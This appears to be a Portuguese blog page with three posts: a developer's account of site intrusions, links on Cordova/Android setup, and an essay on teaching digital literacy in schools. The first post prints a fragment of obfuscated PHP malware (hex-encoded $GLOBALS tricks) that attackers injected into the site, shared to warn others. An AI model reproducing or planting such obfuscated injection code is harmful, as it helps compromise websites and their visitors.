Link

Exploit com superglobals do php

Pessoal,

Ano passado tive muito probleminha com invasão em um site que dou manutenção. Este site anunciou em tv, outdoor e etc. E ai já sabe né? Prego que se destaca, leva martelada.

O site era versionado com git. Logo, após as invasões, eu consegui facilmente identificar os arquivos injetados. Os arquivos geralmente continham algo parecido com isso:

<?php $GLOBALS['v5fd1710b'] = "\x34\x30\xa\x33\x6f\x52\x5e\x71\x2a\x24\x66\x3e\x78\x50\x2d\x4b\x2c\x6b\x35\x5b\x5d\x7a\x58\x9\x47\x69\x41\x45\x21\x56\x68\x7d\x7b\x36\x76\x73\x6a\x7c\x6e\x6c\x64\x26\x43\x5a\x48\x3a\x25\x6d\x40\x23\x60\x70\x4e\x7e\x4a\x3c\x72\x44\xd\x4f\x62\x74\x20\x28\x46\x63\x5c\x65\x4c\x31\x54\x32\x3f\x67\x3d\x75\x49\x22\x42\x61\x51\x57\x5f\x27\x38\x2e\x59\x53\x2b\x37\x39\x4d\x29\x2f\x79\x55\x3b\x77";
$GLOBALS[$GLOBALS['v5fd1710b'][38].$GLOBALS['v5fd1710b'][79].$GLOBALS['v5fd1710b'][10].$GLOBALS['v5fd1710b'][1].$GLOBALS['v5fd1710b'][18].$GLOBALS['v5fd1710b'][84].$GLOBALS['v5fd1710b'][79]] = $GLOBALS['v5fd1710b'][65].$GLOBALS['v5fd1710b'][30].$GLOBALS['v5fd1710b'][56];
$GLOBALS[$GLOBALS['v5fd1710b'][65].$GLOBALS['v5fd1710b'][90].$GLOBALS['v5fd1710b'][89].$GLOBALS['v5fd1710b'][10]] = $GLOBALS['v5fd1710b'][4].$GLOBALS['v5fd1710b'][56].$GLOBALS['v5fd1710b'][40];

Após uma pesquisa rápida, achei um link que foi muito útil pra mim e espero que sirva pra vocês também (na verdade eu espero que vocês não passem por isso):

https://www.conetix.com.au/blog/php-superglobals-exploit

Link

Links: montando ambiente e compilando apps cordova

Pessoal,

Alguns links que me ajudaram muito na criação de ambiente android e um fórum bacana que tem uma comunidade muito legal pra tirar dúvidas (old but gold):

Fórum: http://www.androidz.com.br/forum/forum/5-android-developers/
Link 1: http://opensourceforu.com/2011/08/build-android-apps-using-html-with-phonegap/
Link 2: http://blog.algorich.com.br/2012/07/23/iniciando-no-desenvolvimento-android-com-phonegap/

Citação

A programação deveria ser uma disciplina presente na grade curricular das escolas?

Programação na prática, talvez não. A inclusão digital de verdade, sim.

Atualmente, muitas pessoas se questionam sobre algumas matérias obrigatórias no ensino médio. O que era pra ser um preparo para uma entrada no mercado de trabalho, ou até mesmo um aprimoramento do que queremos fazer na faculdade, se torna um aglomerado de assuntos que no final das contas, não iremos utilizar tanto assim. Qual a ultima vez que você utilizou a equação do segundo grau? Ou precisou recordar a organização celular de uma célula eucarionte?

Não quero defender aqui que este tipo de conhecimento seja desnecessário ou fútil. Mas praticando um pouco de alteridade, podemos simular uma situação simples. Se eu quisesse me tornar um cirurgião plástico de sucesso, por que precisaria aprender a programar? Vamos praticar o inverso também. Quero me tornar um matemático acadêmico de sucesso. Por que eu preciso destrinchar tanto a biologia?

Mas então, nada de tecnologia nas escolas? Sim. A área da tecnologia que todos deveriam saber. Quem mais sabe o que são cookies, a não ser profissionais web? O que é RFID? Como funciona o gps do meu smartphone? Por que não é seguro me conectar em uma rede Wi-Fi pública? Por que quando eu pesquiso tênis na internet, anúncios sobre tênis ficam aparecendo durante horas em meu navegador? Estes sim, são assuntos indispensáveis sobre tecnologia.

Se começarmos a partir do pressuposto de que a pessoa que está do outro lado tem noção de como as coisas acontecem, aquilo não é mais ‘mágica’. Atualmente percebemos que algumas pessoas acham que os recursos digitais funcionam milagrosamente. A inclusão digital de verdade seria uma ótima matéria para desmistificar isso. Hoje nas escolas, se preocupam em ensinar a usar o Windows ou Android. Isso é simples. Deixa um notebook ou um tablet na mão de uma criança e um mês depois ela vai te ensinar a usar.

Mas essa mesma criança, cinco anos depois continuará a não saber o que são cookies, politicas de segurança nos e-mails, o grande problemas de redes Wi-Fi públicas e etc. Isso sim, deveria ser matéria primordial nas escolas. Afinal de contas, até os que não querem, estão inseridos no mundo digital.

 

Resposta publicada em atividade acadêmica em 15/05/2016